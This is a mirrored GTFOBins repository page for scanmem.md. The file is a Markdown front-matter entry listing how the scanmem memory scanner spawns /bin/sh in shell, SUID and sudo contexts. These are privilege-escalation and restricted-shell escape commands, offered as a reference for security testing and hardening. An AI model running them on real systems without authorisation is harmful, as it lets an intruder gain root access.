1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-09 00:41:33 +01:00
GTFOBins.github.io/_gtfobins/scanmem.md
Miguel R f4e32136aa
Add scanmem
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-07-02 13:25:48 +02:00

16 lines
207 B
Markdown

---
functions:
shell:
- code: |
scanmem
shell /bin/sh
suid:
- code: |
./scanmem
shell /bin/sh
sudo:
- code: |
sudo scanmem
shell /bin/sh
---